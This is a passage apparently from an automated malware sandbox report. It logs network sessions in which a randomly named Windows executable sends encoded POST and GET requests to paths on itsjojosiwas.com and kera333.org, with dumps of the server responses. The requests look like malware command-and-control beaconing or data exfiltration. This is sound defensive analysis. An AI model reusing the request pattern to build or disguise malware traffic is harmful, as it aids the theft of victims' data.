                            Set-Cookie: CSRF=1721107453781; path=/
                            Set-Cookie: PHPSESSID=4i6sn1bhhvc7a5s6kkdqb09nvc; path=/
                            Pragma: no-cache
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <https://www.itsjojosiwas.com/wp-json/>; rel="https://api.w.org/"
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p79prrqyA5CrYcCZR7vzG7Ds5MoZGQaAg0WaRU1uaQg4IPJnvAYwgA8zaof52OwwDPL2vhaKAYDFK2H0tNVhn6TENg6YFyOq9pO8anOEgVqh7IRH05%2BBpMNKW74YQkfJ2xnC6OTeuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f9090df395e66-EWR
                            Content-Encoding: gzip
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 33 30 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 77 db 46 92 e8 67 e9 57 74 e8 49 28 6e 08 10 8d 37 48 49 99 8c c7 b3 eb 73 a2 89 37 76 76 ee ac ed eb 03 82 4d 12 36 08 20 00 a8 e7 ea f7 ec b9 7f 63 7f d9 3d 55 d5 78 51 a0 48 59 f6 6c f6 5e 79 26 52 0b e8 ae 57 57 55 bf aa 1a c7 df fc f9 e7 e7 6f fe fe ea 05 5b 16 ab e8 f4 f0 f8 1b 45 79 1b ce d9 cb 17 cc 63 ef 4f d9 31 3c 66 91 1f 2f 4e 7a 22 56 7e 7d dd 63 41 e4 e7 f9 49 2f 14 1e 8b 12 7f 16 c6 0b 25 0f 0b c1 e2 44 f9 98 f7 4e d9 f1 37 6f 45 3c 0b e7 ef 15 a5 05 cf dd 05 cf 7d 00 bc a3 45 21 90 c8 c1 7f 7c 73 f4 f2 c5 e0 fd 29 bc 39 dd 0e 7e 0b 68 45 69 83 5f 0a 7f 76 7a 78 70 bc 12 85 cf 82 a5 9f e5 a2 38 e9 fd fa e6 2f 8a db 63 23 78 13 85 f1 27 96 89 e8 a4 97 66 c9 3c 8c 44 8f 2d 33 31 3f e9 2d 8b 22 1d 8f 46 8b 55 ba 50 93 6c 31 ba 9c c7 23 ce ef b6 0a e3 c5 d4 0f 3e 35 9b e5 e3 d1 e8 e2 e2 42 0d 8b fc 63 f2 31 c9 c3 0b 3f 57 83 64 35 ba 5c 45 59 1a a8 e9 32 45 38 44 56 ec af c4 49
                            Data Ascii: 30f1}kwFgWtI(n7HIs7vvM6 c=UxQHYl^y&RWWUo[EycO1<f/Nz"V~}cAI/%DN7oE<}E!|s)9~hEi_vzxp8/c#x'f<D-31?-"FUPl1#>5Bc1?Wd5\EY2E8DVI
                            Jul 16, 2024 07:24:14.799156904 CEST1236INData Raw: 6f 91 24 8b 48 20 3f ca b9 c8 c2 79 18 f8 45 98 c4 3d 16 24 71 21 e2 e2 a4 f7 2f f3 eb 57 2f 8b fc c7 b3 9f 8b dc ba 34 c4 cb 7f fb f7 e9 73 7d ed b9 53 e5 5f 4d fd 57 3e fd 67 2f 7a a3 fd f6 8b bd fa bb 24 33 0f b2 30 2d 4e 8f e6 eb 38 00 60 47
                            Data Ascii: o$H ?yE=$q!/W/4s}S_MW>g/z$30-N8`G TQW5ihn}7vp4KJZ^D~&#W?KI+.q3q9d$ Cq&Y`"8Ca~$Np^Qf%Y*3vKV,{{
                            Jul 16, 2024 07:24:14.799303055 CEST1236INData Raw: 05 53 eb 3e ea 5b d5 35 6d a6 b9 e6 3d 42 29 85 0d d4 bb 62 c6 e7 c1 7d b0 9b b5 35 db 33 84 71 5f ed 74 9d a5 11 54 f5 a6 16 17 9b 3c 2e c0 46 44 5c dc 81 ad 14 c9 06 00 50 35 3f ab 5a 1c 71 c3 9a 89 c5 30 5b 4c fd 23 7b c8 4d 67 a8 eb ce 90 0f
                            Data Ascii: S>[5m=B)b}53q_tT<.FD\P5?Zq0[L#{Mg-<<5tP`+MbP!w65wm'}b-}]kbkH!4$@%k9]'pO';:`{CCYI?[)y*"[EC0:\
                            Jul 16, 2024 07:24:14.799339056 CEST1236INData Raw: 6c f7 d1 df e3 f4 6c 37 fc ae 31 b4 eb 44 f0 51 74 74 42 ec 9c 0f 6c 9e e5 3d 0a ed 5d 70 5b 71 96 27 7a 5f 00 5f 09 ea 3e 1d 84 33 bc 2f a3 6e 00 69 9b 9f c7 23 bb 47 a1 a9 c1 74 e0 68 1f ce 3d 0a 4f 1b 54 07 ae f2 78 ee 51 58 4a 20 1d f0 f1 78
                            Data Ascii: ll71DQttBl=]p[q'z__>3/ni#Gth=OTxQXJ x>?: nu'yv}@l!^vly*!eh`PRd!=/7uR$RJtG]$f(O_MS<VLJ\0TaaN(,lf"&_
                            Jul 16, 2024 07:24:14.799751043 CEST896INData Raw: e0 89 92 39 ab f0 be d5 de b3 93 13 d6 a7 34 d5 fe a0 84 ce 4e 5a 75 26 0f 03 ca 37 80 56 94 b6 c0 f2 87 82 d5 09 6c 32 fd 08 79 a5 83 06 d7 2d b8 fa fb 7b 84 80 12 2c 27 01 6f f7 a3 a0 92 49 83 29 f6 dd 77 e5 f3 46 ae 7e fe fd 68 11 0e 59 bf 3f
                            Data Ascii: 94NZu&7Vl2y-{,'oI)wF~hY?`>@of|}jIrR}Xd&~d&18`0Z~U4B?*?]MG:(>%!^De<Ong{WD!~ma:~.&2}p
                            Jul 16, 2024 07:24:14.799783945 CEST1236INData Raw: 3c 5d 78 e4 47 af 24 1a 44 a7 e6 69 14 16 47 6d b2 07 6a 1e 85 81 38 52 f8 40 4d 93 74 2b d1 b8 7d 70 d4 b5 21 d2 58 b2 0c ef 99 00 48 df fb 21 9c e5 63 f6 b6 62 7c a0 c2 ae ee 51 5f f2 fa 21 9c f5 07 ec fd 70 27 18 50 cb 31 2b 9b f5 87 f7 2c ab
                            Data Ascii: <]xG$DiGmj8R@Mt+}p!XH!cb|Q_!p'P1+,D/3f__mskunWx];qO&c8&a9)b),-o:](W}s>5=CnGqeGQkEx(1{d=G~&4|pB+_
                            Jul 16, 2024 07:24:14.799820900 CEST1236INData Raw: ac c0 80 e4 67 10 a4 7d e7 31 dd df 74 f7 39 e5 c0 f5 f0 6e 68 bf a4 23 ff 04 f3 13 98 f5 91 01 28 99 1c d6 e1 e2 6f 39 e5 c3 a1 ae 77 fa fa 53 98 b2 22 29 e7 4d c7 23 1f 98 82 c1 12 bb 8d 06 3f 00 7f 70 78 70 4c 5e 1c df 50 b1 ba 6c 5c be 41 4a
                            Data Ascii: g}1t9nh#(o9wS")M#?pxpL^Pl\AJ0tqJfRC?j;\GpNp~0A9sl cT3IrVE*"Qnl!!9E%c{{2d-Y#u>yFC&_c2LV~@$
                            Jul 16, 2024 07:24:14.799854040 CEST1236INData Raw: 85 bb 9a b4 e3 8f 7a a7 df 3d 33 ec 89 94 bb a6 6a da f1 08 81 d0 83 ba 3f ca d2 61 37 b9 28 66 dc f3 a8 17 f4 50 af c8 92 78 71 aa c1 36 29 96 0e 9b 7d 4c 5d cc 1e b8 52 da 5c 11 c2 5a e8 22 9c 2d 44 f1 01 ae 2f 80 6f 7e e2 ce 7a e7 ae 60 57 c5
                            Data Ascii: z=3j?a7(fPxq6)}L]R\Z"-D/o~z`WraYiWab_~ ViqD_V1~tpXy'rKvV~Cn>t&6kbrWM9[ <@ozC'^Tvly.
                            Jul 16, 2024 07:24:14.800635099 CEST1236INData Raw: 15 5c 13 79 d4 a8 9b 0c 07 1a 73 13 3b 15 24 69 58 1c fc 28 d7 10 bf 0d cc 72 fc a9 9b d8 4f 16 f2 e4 98 38 52 da 0e 84 87 aa 2e a7 df b6 61 a2 dd b8 2e 7a 6c 0f 7c a3 a1 73 b0 3b 0f 41 e8 e0 f5 0d 0f 3c 9b e6 59 30 90 18 80 d3 75 5d 66 a8 b6 0d
                            Data Ascii: \ys;$iX(rO8R.a.zl|s;A<Y0u]f eufNPYWn0C.KD&h^Bi9 >dtr|O#ApLM=SA@(>*^*q]:V'e,g9T^H-io6 2PwtBba-h9g
                            Jul 16, 2024 07:24:14.800671101 CEST1236INData Raw: 9a ff 12 12 b0 cb d2 33 55 7c 54 65 f4 1c b0 f7 e7 e8 52 cb a8 0c 3f 0d 94 11 37 cb 96 ba aa 55 ee 5a 57 ed ba 17 c0 6a 4a e5 d4 70 56 eb 95 45 69 52 30 ad a5 05 81 ce 2a 0f 8c 9c 59 ac 31 22 30 d9 35 58 2e f5 55 d3 38 5a 9d 23 55 0a 48 b2 36 64
                            Data Ascii: 3U|TeR?7UZWjJpVEiR0*Y1"05X.U8Z#UH6dl0vZ<ZzCe3pG4,-4`%4m-|k_RDueHIcM:UK7+E`_^m,yepmGGdv`2PL+VA)lRz!0.Q.4f90@pN
                            Jul 16, 2024 07:24:14.800708055 CEST1236INData Raw: 35 28 32 0c bb d0 35 8d 12 30 46 37 c9 3e 90 65 b4 1d 24 9e 6c 8e 1c 84 4d c7 43 16 2e 18 a0 92 69 23 3a ae 5b e7 3a 9e f4 44 a6 0c 19 72 5c 0e 72 71 f0 44 c1 c1 50 27 9d 97 f1 69 a8 4e 78 a0 64 c9 b2 0c 95 41 17 65 53 9f 31 b3 dc 5b 92 a6 29 25
                            Data Ascii: 5(250F7>e$lMC.i#:[:Dr\rqDP'iNxdAeS1[)%eDZYFM>8(1LZ4s%e}AG"{KP_4qK}A JGdJGL{S\%KeT"WZGFG@>uq52_!L7[gHKo*}7W{5QY


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            39192.168.2.449776172.67.196.1801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:15.701601982 CEST10745OUTPOST /0koa/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.itsjojosiwas.com
                            Origin: http://www.itsjojosiwas.com
                            Referer: http://www.itsjojosiwas.com/0koa/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 72 6d 4a 54 2f 41 2f 71 64 4d 32 35 54 68 75 65 51 35 4e 61 76 78 6a 67 30 56 68 65 4d 31 55 77 77 48 55 75 2b 48 46 57 71 33 48 44 4f 6b 51 67 64 57 39 47 49 6c 79 74 4c 42 52 71 46 57 2b 70 46 4b 6d 32 50 43 6c 32 74 6a 57 44 55 78 36 42 7a 2b 44 48 36 78 61 67 2f 4b 70 2f 39 37 47 64 6c 6f 32 78 49 69 64 47 54 39 42 4c 49 36 61 73 64 47 73 4c 7a 35 49 4c 45 41 38 41 48 2f 67 53 6a 71 77 38 54 4d 49 70 49 39 50 39 33 4b 41 65 70 56 6f 69 32 54 6c 46 37 50 49 46 79 36 47 6c 45 58 4d 31 6e 48 4e 5a 4b 55 43 77 71 59 4c 4b 4f 61 2b 65 6e 4f 53 4d 4a 62 6f 5a 63 2f 51 32 7a 42 4f 65 4c 59 5a 43 68 4a 38 43 46 6b 6b 50 53 42 59 53 4d 49 6c 32 50 48 4a 38 33 6c 61 47 34 39 45 32 72 6e 6d 39 53 77 78 7a 4b 59 68 4f 68 78 74 6a 59 69 71 75 59 48 75 54 56 39 57 73 2b 63 2f 71 7a 7a 31 4d 6d 4f 6d 46 79 6c 79 4f 73 5a 54 70 43 6e 47 77 55 75 4e 6f 46 76 30 32 67 30 66 4b 59 6b 4b 2f 58 33 6c 32 7a 6c 36 67 61 59 50 51 57 53 43 72 59 32 55 4b 50 48 65 6a 36 6d 6f 73 44 55 4b 70 4c 2b 33 31 71 4e [TRUNCATED]
                            Data Ascii: UbV=rmJT/A/qdM25ThueQ5Navxjg0VheM1UwwHUu+HFWq3HDOkQgdW9GIlytLBRqFW+pFKm2PCl2tjWDUx6Bz+DH6xag/Kp/97Gdlo2xIidGT9BLI6asdGsLz5ILEA8AH/gSjqw8TMIpI9P93KAepVoi2TlF7PIFy6GlEXM1nHNZKUCwqYLKOa+enOSMJboZc/Q2zBOeLYZChJ8CFkkPSBYSMIl2PHJ83laG49E2rnm9SwxzKYhOhxtjYiquYHuTV9Ws+c/qzz1MmOmFylyOsZTpCnGwUuNoFv02g0fKYkK/X3l2zl6gaYPQWSCrY2UKPHej6mosDUKpL+31qNnr6KoIGtxBjSdlr0xGZXthpUtNfaGYHja+D4zyQWmtxXjUD7pmX56JBtAQ1Za0nmTneLg2vW3cUu+exRST11WfmK+2O0Pb6BiQJT3uuYPN9XJ7ngg3CzqwLgOO5IeozZ9exsUPTGuFn/JN3blx3nqfjP5YI8jFck+ulJ6+hegfIJ0+qSeBmiMOxuzXvVLPfacqzcj1rYeeHZ1kk8E+Ct7GSDRw9oAIwTxXCx9OxQc1SLUKdmyN80e0N01Mt7iUvh5QRgErIPibrJZENK9uvQ3yZS4mMzqGw7hVFW7MRbDqO17P1hSJNhNRtFT0BttyQ6xM5ptgAtUCuLoKiRiCYGhUXag2nGb5jP6ZozJko/XGVo7SDvMphouF9YjPYkSFhWRKmvG2gOXYwokeJuWw0l69AEBcYn2s/7BLdz6cfdymyWDhMGBFkJNcYwswgfXw0yKuLQ5LZvpLbdhVUgKGHE6+1nhpipIP/fH7FpkZQ5BZX0Dq7ekO9y8PoGLuwmK+wn+wFsbxyIJCn08einiy/3HVn/EOyLmrCZHcF4q8XHdxOVaGIW3/l50w3F3+mBEgfysTz9K7nZDIg/+iuzJLFxhkYKUrwoZH0Q3wS0XczbC6ITToPgeFkjaQP6PMeT/rqj8svnAzq83FP5LFaniTK2YCbBKBhfCKDyIB [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            40192.168.2.449777172.67.196.1801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:18.276628971 CEST370OUTGET /0koa/?UbV=mkhz803NSe67VDi/XqoOvDTg0lhLFFwDmFAH6HAD7lWiJHUqLX0wanSTKUh9Wz+qOKuxLFQRu1GlWT2p2cyKlA2Zual+9OKI76CIESdTTdJvOpGtX0Yw5/M=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.itsjojosiwas.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:24:19.765765905 CEST1236INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            Set-Cookie: CSRF=1721107458873; path=/
                            Set-Cookie: PHPSESSID=oh1qlrjchi3ieb6kumhn30vg1c; path=/
                            Pragma: no-cache
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <https://www.itsjojosiwas.com/wp-json/>; rel="https://api.w.org/"
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Tr13Z8%2BW9oolTbsEUDD%2BYtwE%2BwIivvxrVfK%2FBDsuVX2M1v%2BTSlJvFGhb7Td%2BVlpEX%2Fk6EXiopC0Rq3HVKvlzRaG6qKHAmRhWWM%2Flx%2F%2FWTZcHe5AlGDEX7NMq6Nnvk2wn2JZyiSiVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f90b0b8204232-EWR
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 37 63 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 69 65 39 20 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 69 65 38 20 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 65 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66
                            Data Ascii: 7c23<!DOCTYPE html>...[if IE 9 ]> <html lang="en-US" class="ie9 loading-site no-js"> <![endif]-->...[if IE 8 ]> <html lang="en-US" class="ie8 loading-site no-js"> <![endif]-->...[if (gte IE 9)|!(IE)]>...><html lang="en-US" class="loading-site no-js"> ...<![endif]--><head><meta charset="UTF-8" /><link rel="prof
                            Jul 16, 2024 07:24:19.765811920 CEST1236INData Raw: 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 73 6a
                            Data Ascii: ile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="https://www.itsjojosiwas.com/xmlrpc.php" /><meta name="google-site-verification" content="HfzPItsAMOts5x3eIVZbC2u98b-Q42U1bG9lT0qR6mY" /><script>(function(html){html.classNam
                            Jul 16, 2024 07:24:19.765846968 CEST1236INData Raw: 22 7d 5d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 2e 20 2d 2d 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e
                            Data Ascii: "}],"inLanguage":"en-US"}]}</script>... / Yoast SEO plugin. --><link rel='dns-prefetch' href='//www.itsjojosiwas.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link href='https://fonts.gstatic.com' crossorigin rel='pr
                            Jul 16, 2024 07:24:19.766629934 CEST672INData Raw: 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28
                            Data Ascii: adius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css' type='t
                            Jul 16, 2024 07:24:19.766675949 CEST1236INData Raw: 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65
                            Data Ascii: r--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp
                            Jul 16, 2024 07:24:19.766710997 CEST1236INData Raw: 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29 20 35 30 25 2c 72 67 62 28 36 35 2c 38 38 2c 32 30 38 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67
                            Data Ascii: 35deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradien
                            Jul 16, 2024 07:24:19.766745090 CEST1236INData Raw: 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72
                            Data Ascii: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}
                            Jul 16, 2024 07:24:19.767163992 CEST1236INData Raw: 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d
                            Data Ascii: out-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !impor
                            Jul 16, 2024 07:24:19.767199039 CEST1236INData Raw: 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d
                            Data Ascii: }.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(
                            Jul 16, 2024 07:24:19.767232895 CEST1236INData Raw: 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63
                            Data Ascii: bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(
                            Jul 16, 2024 07:24:19.771111012 CEST1236INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d
                            Data Ascii: ar(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !importa


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            41192.168.2.44977864.46.102.70801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:25.435718060 CEST628OUTPOST /9grl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.kera333.org
                            Origin: http://www.kera333.org
                            Referer: http://www.kera333.org/9grl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 79 2f 6b 39 46 33 4b 2b 47 34 4a 4d 4f 52 4d 73 4d 55 57 5a 46 68 63 51 68 6a 75 4a 67 74 54 69 36 4d 47 78 73 66 45 2f 49 2b 4a 74 41 4f 67 6b 4f 4d 71 6d 55 67 64 44 75 41 4a 4c 35 48 57 4b 33 38 4a 67 38 2f 31 53 58 64 59 78 4d 57 5a 4c 68 51 4a 76 6e 65 6f 38 44 64 76 6d 71 75 65 64 6e 44 41 76 39 43 50 5a 39 59 67 56 6b 43 67 5a 63 79 46 6a 74 49 34 66 74 62 6a 38 4a 58 77 59 56 46 44 6a 34 4c 59 6c 34 38 53 32 72 33 46 35 32 46 49 6e 58 30 4e 70 64 66 7a 4f 78 33 5a 4d 53 66 50 76 48 65 66 32 63 75 6d 36 51 38 2b 65 37 43 36 61 4b 6e 2b 58 67 45 6d 33 64 59 69 42 76 67 3d 3d
                            Data Ascii: UbV=y/k9F3K+G4JMORMsMUWZFhcQhjuJgtTi6MGxsfE/I+JtAOgkOMqmUgdDuAJL5HWK38Jg8/1SXdYxMWZLhQJvneo8DdvmquednDAv9CPZ9YgVkCgZcyFjtI4ftbj8JXwYVFDj4LYl48S2r3F52FInX0NpdfzOx3ZMSfPvHef2cum6Q8+e7C6aKn+XgEm3dYiBvg==
                            Jul 16, 2024 07:24:25.896580935 CEST479INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:25 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            42192.168.2.44977964.46.102.70801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:27.972400904 CEST648OUTPOST /9grl/ HTTP/1.1
                            Accept: */*
